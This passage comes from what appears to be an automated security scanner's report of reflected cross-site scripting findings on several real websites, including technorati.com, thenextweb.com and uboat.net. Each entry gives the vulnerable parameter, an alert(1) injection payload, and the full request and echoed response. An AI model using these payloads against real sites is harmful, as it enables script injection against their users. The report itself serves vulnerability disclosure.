
Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29bcb"%3balert(1)//ac69a2e681e was submitted in the cwtagid parameter. This input was echoed as 29bcb";alert(1)//ac69a2e681e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=529997&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=8837729bcb"%3balert(1)//ac69a2e681e HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:02 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="8837729bcb";alert(1)//ac69a2e681e";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _n
...[SNIP]...

3.465. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0eb4"%3balert(1)//a76eb80ef0e was submitted in the cwwidth parameter. This input was echoed as c0eb4";alert(1)//a76eb80ef0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=529997&cwwidth=728c0eb4"%3balert(1)//a76eb80ef0e&cwheight=90&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:02 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728c0eb4";alert(1)//a76eb80ef0e";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="und
...[SNIP]...

3.466. http://technorati.com/cosmos/search.html [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://technorati.com
Path:   /cosmos/search.html

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a773e"><script>alert(1)</script>dab46f51ed7 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cosmos/search.html?url=a773e"><script>alert(1)</script>dab46f51ed7 HTTP/1.1
Host: technorati.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:17:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: tvisitor=10.15.116.210.1298688146319064; path=/; expires=Thu, 25-Feb-16 02:42:26 GMT; domain=.technorati.com
Set-Cookie: NEWTRSESSID=93139fd48176819489f0aeb0fc613749; expires=Mon, 30-May-2011 02:17:09 GMT; path=/; domain=technorati.com
Vary: Accept-Encoding
Connection: close
Content-Length: 34801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://gmp
...[SNIP]...
<link rel="alternate" type="application/rss+xml" href="http://www.ingboo.com/pvm/redir?tid=696.10160&return=posts&q=a773e"><script>alert(1)</script>dab46f51ed7&authority=high&client=rss" title="Technorati search results for a773e">
...[SNIP]...

3.467. http://technorati.com/cosmos/search.html [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://technorati.com
Path:   /cosmos/search.html

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eb43'-alert(1)-'f01b11d4625 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cosmos/search.html?url=5eb43'-alert(1)-'f01b11d4625 HTTP/1.1
Host: technorati.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:17:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: tvisitor=10.15.116.210.1298688151422022; path=/; expires=Thu, 25-Feb-16 02:42:31 GMT; domain=.technorati.com
Set-Cookie: NEWTRSESSID=0c8fef00216e16fd63153afc19943dff; expires=Mon, 30-May-2011 02:17:14 GMT; path=/; domain=technorati.com
Connection: close
Content-Length: 34541


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://gmp
...[SNIP]...
//www.ingboo.com/dhtmlwindowfiles/ing.js");
function popIngboo() {
posX = ($(window).width() - 480 ) / 2;
posY = 200;
ingboosub('tid=696.10160&return=posts&authority=high&q=5eb43'-alert(1)-'f01b11d4625',posX,posY,null,1);
}
</script>
...[SNIP]...

3.468. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [awesm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the awesm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82105</script><script>alert(1)</script>ebaf4f8c75 was submitted in the awesm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX82105</script><script>alert(1)</script>ebaf4f8c75&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=c58okdiednff7kv9uev8soqi94; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:48:25 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:48:25 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:48:25 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82244
Date: Tue, 19 Apr 2011 19:51:47 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
eme_url': 'http://thenextweb.com/industry/wp-content/themes/tnw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX82105</script><script>alert(1)</script>ebaf4f8c75&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to'
};
</script>
...[SNIP]...

3.469. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8bd</script><script>alert(1)</script>73986555b6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?5d8bd</script><script>alert(1)</script>73986555b6d=1 HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=ej3jtbaapag6sv6oln1b9fcd96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:48:16 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:48:16 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:48:16 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82030
Date: Tue, 19 Apr 2011 19:51:38 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
stry',
'theme_url': 'http://thenextweb.com/industry/wp-content/themes/tnw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?5d8bd</script><script>alert(1)</script>73986555b6d=1'
};
</script>
...[SNIP]...

3.470. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the utm_content request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9bcc</script><script>alert(1)</script>f5ad851bd4d was submitted in the utm_content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-maine9bcc</script><script>alert(1)</script>f5ad851bd4d&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=2shuvoef74afqc8k3ecf4kfq14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:48:48 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:48:48 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:48:48 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82211
Date: Tue, 19 Apr 2011 19:52:11 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
dustry/wp-content/themes/tnw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-maine9bcc</script><script>alert(1)</script>f5ad851bd4d&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to'
};
</script>
...[SNIP]...

3.471. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the utm_medium request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d1ad</script><script>alert(1)</script>24749fe4f25 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter8d1ad</script><script>alert(1)</script>24749fe4f25&utm_source=direct-tnw.to HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=3voqo3o46tv6l2mb54bvds3cu5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:49:05 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:49:05 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:49:05 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82211
Date: Tue, 19 Apr 2011 19:52:28 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
nw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter8d1ad</script><script>alert(1)</script>24749fe4f25&utm_source=direct-tnw.to'
};
</script>
...[SNIP]...

3.472. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the utm_source request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a19e</script><script>alert(1)</script>fa26e178082 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to5a19e</script><script>alert(1)</script>fa26e178082 HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=iovjlagptga9dlhualmg2cjsa6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:49:16 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:49:16 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:49:16 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82211
Date: Tue, 19 Apr 2011 19:52:38 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
rl': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to5a19e</script><script>alert(1)</script>fa26e178082'
};
</script>
...[SNIP]...

3.473. http://uboat.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2a26<script>alert(1)</script>f4d51860e62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof2a26<script>alert(1)</script>f4d51860e62 HTTP/1.1
Host: uboat.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=197206507.357766803.1303244360.1303244360.1303244360.1; __utmb=197206507; __utmc=197206507; __utmz=197206507.1303244360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 20:19:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 9021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<strong>http://uboat.net/favicon.icof2a26<script>alert(1)</script>f4d51860e62</strong>
...[SNIP]...

3.474. http://uboat.net/history/wwi/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /history/wwi/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba0c5<script>alert(1)</script>d32186e7767 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /historyba0c5<script>alert(1)</script>d32186e7767/wwi/ HTTP/1.1
Host: uboat.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 19:48:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 8906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<strong>http://uboat.net/historyba0c5<script>alert(1)</script>d32186e7767/wwi/</strong>
...[SNIP]...

3.475. http://uboat.net/history/wwi/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /history/wwi/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dfcc<script>alert(1)</script>3770393b851 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /history/wwi1dfcc<script>alert(1)</script>3770393b851/ HTTP/1.1
Host: uboat.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 19:48:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 9014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<strong>http://uboat.net/history/wwi1dfcc<script>alert(1)</script>3770393b851/</strong>
...[SNIP]...

3.476. http://uid.shoplocal.com/uid.aspx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uid.shoplocal.com
Path:   /uid.aspx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 45a5f<script>alert(1)</script>72002c4d70c was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /uid.aspx?callback=json_results45a5f<script>alert(1)</script>72002c4d70c HTTP/1.1
Host: uid.shoplocal.com
Proxy-Connection: keep-alive
Referer: http://www.jcpstoreads.com/jcpenney/Default.aspx?action=entryflash&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SLHUID=UID=11022007583617319321424330414S&Version=1.65

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 109
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
p3p: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Set-Cookie: SLHUID=UID=11022007583617319321424330414S&Version=1.65; expires=Fri, 26-Feb-2021 04:53:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 04:53:48 GMT

json_results45a5f<script>alert(1)</script>72002c4d70c({'ResultSet':{'UID':'11022007583617319321424330414S'}})

3.477. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_js.js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcc4f'-alert(1)-'60ec268c148 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_js.js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338fcc4f'-alert(1)-'60ec268c148&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
